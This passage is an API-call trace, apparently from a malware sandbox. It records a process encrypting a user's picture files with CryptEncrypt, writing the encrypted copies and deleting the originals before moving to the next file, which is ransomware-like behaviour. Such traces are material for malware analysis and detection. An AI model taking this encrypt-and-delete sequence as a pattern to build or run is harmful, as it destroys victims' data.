lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0095.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0095.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0095.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0095.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0095.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0095.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd88 | out: hHeap=0x1780000) returned 1 [0095.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0095.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0095.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff18 | out: hHeap=0x1780000) returned 1 [0095.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0095.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfea0 | out: hHeap=0x1780000) returned 1 [0095.577] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0095.577] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0095.577] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e93c8 | out: hHeap=0x1780000) returned 1 [0095.577] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0095.577] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0095.577] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0095.577] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f48 | out: hHeap=0x1780000) returned 1 [0095.577] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0095.577] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0095.577] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0095.577] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0095.579] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0095.579] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0095.579] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cac10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0095.579] CryptEncrypt (in: hKey=0x41ac180, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e538*=0x1089f, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e538*=0x108a0) returned 1 [0095.579] CharLowerBuffW (in: lpsz="byte[67745]", cchLength=0xb | out: lpsz="byte[67745]") returned 0xb [0095.581] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0095.581] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0095.581] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0095.581] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cafe8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0095.582] CryptEncrypt (in: hKey=0x41ac180, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x499a008*, pdwDataLen=0x144e538*=0x1089f, dwBufLen=0x108a0 | out: pbData=0x499a008*, pdwDataLen=0x144e538*=0x108a0) returned 1 [0095.582] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0095.582] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0095.582] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0095.583] WriteFile (in: hFile=0x298, lpBuffer=0x4516010*, nNumberOfBytesToWrite=0x108a0, lpNumberOfBytesWritten=0x144ef3c, lpOverlapped=0x0 | out: lpBuffer=0x4516010*, lpNumberOfBytesWritten=0x144ef3c*=0x108a0, lpOverlapped=0x0) returned 1 [0095.587] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0095.587] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0095.587] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0095.588] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0095.588] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43ca940, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0095.588] CryptDestroyKey (hKey=0x41ac180) returned 1 [0095.588] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0095.588] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0095.588] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0095.588] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0095.588] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0095.588] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0095.588] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0095.588] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0095.588] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0095.588] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0095.588] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796ea8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0095.588] CryptReleaseContext (hProv=0x41a5360, dwFlags=0x0) returned 1 [0095.588] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0095.588] FreeLibrary (hLibModule=0x756e0000) returned 1 [0095.588] CloseHandle (hObject=0x258) returned 1 [0095.590] CloseHandle (hObject=0x298) returned 1 [0095.602] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\Z3f-n12Dk_aAtm.jpg", nBufferLength=0x7fff, lpBuffer=0x143ef38, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\Z3f-n12Dk_aAtm.jpg", lpFilePart=0x0) returned 0x32 [0095.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431e4f0 [0095.602] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\Z3f-n12Dk_aAtm.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\cliksz\\z3f-n12dk_aatm.jpg")) returned 0x20 [0095.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca118 [0095.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0095.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0a0 [0095.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23d0 [0095.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca130 [0095.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0095.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca058 [0095.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2330 [0095.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391e38 [0095.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24c0 [0095.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431e220 [0095.603] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0095.603] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8c78 [0095.603] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\Z3f-n12Dk_aAtm.jpg", lpFindFileData=0x144ef80 | out: lpFindFileData=0x144ef80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4a8d33d0, ftCreationTime.dwHighDateTime=0x1d5ede1, ftLastAccessTime.dwLowDateTime=0xc1008940, ftLastAccessTime.dwHighDateTime=0x1d5e8ff, ftLastWriteTime.dwLowDateTime=0xc1008940, ftLastWriteTime.dwHighDateTime=0x1d5e8ff, nFileSizeHigh=0x0, nFileSizeLow=0x1089f, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="Z3f-n12Dk_aAtm.jpg", cAlternateFileName="Z3F-N1~1.JPG")) returned 0x41ac2c0 [0095.603] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\Z3f-n12Dk_aAtm.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\cliksz\\z3f-n12dk_aatm.jpg")) returned 1 [0095.650] FindNextFileW (in: hFindFile=0x41ac2c0, lpFindFileData=0x144ef80 | out: lpFindFileData=0x144ef80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4a8d33d0, ftCreationTime.dwHighDateTime=0x1d5ede1, ftLastAccessTime.dwLowDateTime=0xc1008940, ftLastAccessTime.dwHighDateTime=0x1d5e8ff, ftLastWriteTime.dwLowDateTime=0xc1008940, ftLastWriteTime.dwHighDateTime=0x1d5e8ff, nFileSizeHigh=0x0, nFileSizeLow=0x1089f, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="Z3f-n12Dk_aAtm.jpg", cAlternateFileName="Z3F-N1~1.JPG")) returned 0 [0095.650] FindClose (in: hFindFile=0x41ac2c0 | out: hFindFile=0x41ac2c0) returned 1 [0095.650] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8c78 | out: hHeap=0x1780000) returned 1 [0095.650] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0095.650] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9fc8 | out: hHeap=0x1780000) returned 1 [0095.650] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0095.650] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431e4f0 | out: hHeap=0x1780000) returned 1 [0095.650] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24d0 | out: hHeap=0x1780000) returned 1 [0095.650] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f08 | out: hHeap=0x1780000) returned 1 [0095.650] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f38 | out: hHeap=0x1780000) returned 1 [0095.650] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf428 | out: hHeap=0x1780000) returned 1 [0095.650] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0095.650] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac280 | out: hHeap=0x1780000) returned 1 [0095.650] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0095.650] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8d08 | out: hHeap=0x1780000) returned 1 [0095.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ff8 | out: hHeap=0x1780000) returned 1 [0095.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca040 | out: hHeap=0x1780000) returned 1 [0095.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f98 | out: hHeap=0x1780000) returned 1 [0095.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2400 | out: hHeap=0x1780000) returned 1 [0095.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf658 | out: hHeap=0x1780000) returned 1 [0095.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f50 | out: hHeap=0x1780000) returned 1 [0095.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23e0 | out: hHeap=0x1780000) returned 1 [0095.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf798 | out: hHeap=0x1780000) returned 1 [0095.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x19d20a8 | out: hHeap=0x1780000) returned 1 [0095.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23f0 | out: hHeap=0x1780000) returned 1 [0095.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9fe0 | out: hHeap=0x1780000) returned 1 [0095.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f20 | out: hHeap=0x1780000) returned 1 [0095.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf7c0 | out: hHeap=0x1780000) returned 1 [0095.651] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0095.651] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0095.651] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2490 [0095.651] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf798 [0095.651] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0095.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf798 | out: hHeap=0x1780000) returned 1 [0095.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0095.651] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf658 [0095.651] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e24a0 [0095.651] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf798 [0095.651] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ed8 [0095.651] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23d0 [0095.652] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0e8 [0095.652] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23e0 [0095.652] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0095.652] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca100 [0095.652] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0095.652] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369dc8 [0095.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca100 | out: hHeap=0x1780000) returned 1 [0095.652] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23f0 [0095.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23f0 | out: hHeap=0x1780000) returned 1 [0095.652] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f98 [0095.652] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xb0) returned 0x42d9380 [0095.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369dc8 | out: hHeap=0x1780000) returned 1 [0095.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f98 | out: hHeap=0x1780000) returned 1 [0095.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0095.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23e0 | out: hHeap=0x1780000) returned 1 [0095.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0095.652] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9fc8 [0095.652] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf7c0 [0095.652] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f50 [0095.652] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2490 [0095.652] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f98 [0095.652] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f68 [0095.652] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0095.652] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0095.653] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24c0 [0095.653] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24d0 [0095.653] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ee8 [0095.653] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ee8 | out: hHeap=0x1780000) returned 1 [0095.653] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24d0 | out: hHeap=0x1780000) returned 1 [0095.653] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24c0 | out: hHeap=0x1780000) returned 1 [0095.653] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0095.653] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2360 [0095.653] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0095.653] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9fe0 [0095.653] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23d0 [0095.653] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca148 [0095.653] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0095.653] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\z6qa.jpg", lpFindFileData=0x144ee20 | out: lpFindFileData=0x144ee20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2b717770, ftCreationTime.dwHighDateTime=0x1d5e73f, ftLastAccessTime.dwLowDateTime=0xdce5a1d0, ftLastAccessTime.dwHighDateTime=0x1d5e252, ftLastWriteTime.dwLowDateTime=0xdce5a1d0, ftLastWriteTime.dwHighDateTime=0x1d5e252, nFileSizeHigh=0x0, nFileSizeLow=0x123f1, dwReserved0=0x10189fc, dwReserved1=0x8, cFileName="z6qa.jpg", cAlternateFileName="")) returned 0x41ac640 [0095.653] FindClose (in: hFindFile=0x41ac640 | out: hFindFile=0x41ac640) returned 1 [0095.653] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca148 | out: hHeap=0x1780000) returned 1 [0095.654] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9fe0 | out: hHeap=0x1780000) returned 1 [0095.654] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf428 | out: hHeap=0x1780000) returned 1 [0095.654] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0095.654] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e48 [0095.654] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24c0 [0095.654] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391d20 [0095.654] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0095.654] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391d20 | out: hHeap=0x1780000) returned 1 [0095.654] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24c0 | out: hHeap=0x1780000) returned 1 [0095.654] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0095.654] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e23d0 [0095.654] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf450 [0095.654] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9fe0 [0095.654] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23f0 [0095.654] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f08 [0095.654] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23f0 | out: hHeap=0x1780000) returned 1 [0095.654] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca040 [0095.654] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0095.654] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ff8 [0095.654] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23e0 [0095.654] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ff8 | out: hHeap=0x1780000) returned 1 [0095.655] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0095.655] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f38 [0095.655] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca100 [0095.655] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8c30 [0095.655] PeekMessageW (in: lpMsg=0x144eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eebc) returned 0 [0095.655] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0095.655] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ff8 [0095.655] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23f0 [0095.655] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca058 [0095.655] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f20 [0095.655] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24c0 [0095.655] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f20 | out: hHeap=0x1780000) returned 1 [0095.655] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24d0 [0095.655] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391e38 [0095.655] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0095.655] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391e38 | out: hHeap=0x1780000) returned 1 [0095.655] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24d0 | out: hHeap=0x1780000) returned 1 [0095.655] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0095.655] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e24d0 [0095.655] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0095.655] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca028 [0095.655] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2400 [0095.655] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca070 [0095.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2400 | out: hHeap=0x1780000) returned 1 